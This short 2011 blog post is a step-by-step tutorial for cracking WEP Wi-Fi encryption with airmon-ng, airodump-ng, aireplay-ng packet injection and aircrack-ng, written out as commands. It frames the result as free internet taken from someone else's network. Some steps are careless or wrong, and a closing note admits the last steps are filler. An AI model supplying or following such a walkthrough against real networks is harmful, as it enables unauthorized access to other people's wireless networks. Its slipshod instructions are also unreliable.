Pages

Saturday, September 17, 2011

20 steps to Backtrack WEP Hacking Tutorial

1.Open terminal

2.Type /etc/init.d/networking start

3.Set the wireless card to monitor mode ( Type airmon-ng )

4.Type airmon-ng stop [ wireless card name ]

5.Type airmon-ng start [ wireless card name ]

6.Type airmon-ng again to see the changes

7.Type airodump-ng [ wireless card name ]

8.Find the one with a web encryption and write down its channel/bssid/essid

9.Hit ctrl + c to stop

10.Type airodump-ng -w wep -c [ channel number ] --bssid [ bssid number] [ wireless card name ]

11.Leave it running and open a new console

12.Type in aireplay-ng -1 0 -a [ bssid ] [ wireless card number ]

13.Open a new console and type aireplay-ng -3 -b [ bssid ] [ wireless card name ]

14.Watch the first terminal console and let the data runs until it hits more than 30,000

15.Bring up the console that is sending and receiving data and hit ctrl + c

16.Type dir for the root directory

17.Find the .cap file which has the wireless key

18.Type aircrack-ng [ filename ].cap

19.Viola!! It gives you the wireless key

20.Enjoy your freaking free internet~ ♥

p/s : last2 dh xtau nak tulis apa saja nk cukupkan 20 :P

No comments:

Post a Comment